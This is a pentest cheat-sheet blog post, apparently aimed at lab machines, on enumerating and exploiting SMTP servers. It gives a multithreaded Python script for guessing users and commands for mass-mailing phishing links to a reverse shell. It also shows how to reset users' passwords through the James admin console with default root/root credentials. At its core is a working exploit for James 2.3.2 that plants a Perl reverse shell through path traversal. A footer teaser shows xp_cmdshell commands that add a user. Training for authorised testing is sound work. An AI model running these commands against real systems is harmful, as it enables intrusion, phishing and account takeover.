Skip to main content

SMTP - Port 25 Enumeration

By 


Basic info About SMTP Commands

PIPELINING – Pipelining Sends batches of SMTP commands without waiting for a response from the SMTP Server to individual comments.
SIZE – SIZE extension has two purposes:
    To give the server an estimate of the size of a message before the message is transmitted.
    To warn the client that messages above a certain size will not be accepted.
ETRN – allows an SMTP server to send a request to another SMTP server to send any e-mail messages it has. The ETRN command has been specifically designed to allow integration with dial-up mail servers.
8BITMIME – is a way for SMTP servers that support it to transmit email using 8-bit character sets in a standards-compliant way that won’t break old servers.
DSN – DSN (Delivery Status Notification) is an extension to SMTP email delivery that can notify senders about the status of their message’s delivery.
STARTTLS –  StartTLS is mainly used as a protocol extension for communication by e-mail, based on the protocols SMTP, IMAP, and POP. In order to encrypt the information transmitted.

SMTP User Enum

smtp-user-enum -U /usr/share/SecLists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D DOMAIN.com -t 10.10.10.10 -m 50 -M RCPT

Commonly used smtp names
SMTP Enum via NC/Telnet

nc -nv 10.10.10.10 25
EHLO domain.com



SMTP User Enum Script

import sys
import socket
import threading
 
ip = '10.13.38.12'
domain = 'EXCHANGE.HTB.LOCAL'
mail_from = 'morph3@ecorp.com'
n_threads = 50
m_list = []
t_list = []
 
if (len(sys.argv) < 2):
    print("python smtp_user_enum.py wordlist.txt")
    sys.exit(1)
 
fn = sys.argv[1]
f = open(fn,"r")
[m_list.append(m.replace("\n","")) for m in f]
m_list.reverse()
 
def send_mail():
    while True:
        try:
            print len(m_list)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, 25))
            r = s.recv(1024)
            s.send(("HELO {}\r\n".format(domain)).encode())
            r = s.recv(1024)
            s.send(("MAIL FROM: {}\r\n".format(mail_from)).encode())
            r = s.recv(1024)
            x = m_list.pop()
            s.send("RCPT TO: {}@humongousretail.com\r\n".format(x))
            r = s.recv(1024)
            r = r.decode()
            if "550" not in r:
                print x
        except IndexError:
            sys.exit(1)
    return 
 
for t in range(n_threads):
    t = threading.Thread(target=send_mail,)
    t_list.append(t)
    t.daemon = True
    t.start()
 
for t in t_list:
    try:  
        t.join()
    except KeyboardInterrupt:
        sys.exit(1)
 Send Email to Multiple Emails 

 while read mail; do swaks --to $mail --from it@Bhanu.notes --header “Subject: Testing the below url” --body " open this url dude http://10.10.14.63/ " --server 10.10.10.10; done < mail.txt 
Send Email via SMTP 

swaks --to sales@domain.com --from it@domain.com --header "Subject: Credentials / Errors" --body "website_name http://10.10.10.10/" --server domain.com
Send an email via SMTP TO users 

telnet 10.10.10.10 25 

MAIL FROM: IT@company.com
RCPT TO: user@company.com
DATA
yo, please click on my reverse shell, so that i can hack you at http://10.10.10.10/
.
quit
If you have email and Credentials --> login using Evolution tool

evolution

A service running SMTP - Simple Mail Transfer Protocol looks like this

Port - 25,110 and someother UDP ports (4555) should be open for proper enum

 

As it was saying Admin panel on 4555 lets take a look at it. 

use telnet for better response . 

telnet IP_ADDRESS 4555

try default login creds - root/root

help     /View commands 

adduser  /add a new user 

listusers /list all users


lets reset the users passwords 

telnet IP_ADDRESS 4555

setpassword user password        /reset the password, later we can read mails with these creds

View Emails from SMTP Server

telnet IP_ADDRESS 110 

USER john
PASS john

LIST       /list the received emails

OK 0 0      /if you see anything other than "0" --> there should be an email for them

RETR 1     /View the first mail


Exploiting James SMTP Server 2.3.2 


creating an user:
telnet IP_ADDRESS 4555
root  /username
root  /pass
adduser ../../../../../../../../etc/bash_completion.d password


sending a mail:
----------------
telnet ip_address 25
EHLO someone@mydomain
MAIL FROM: <'@mydomain>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
FROM: someone@mydomain
'
perl -e 'use Socket;$i="KALI_IP";$p=9007;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
.
quit


Gaining the Shell:

nc -nvlp 9007        /Will get a shell right after we login to SSH

ssh user@IP_ADDRESS 

if you get a  limited shell, try gaining one more reverse shell to another terminal and 
try it.
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more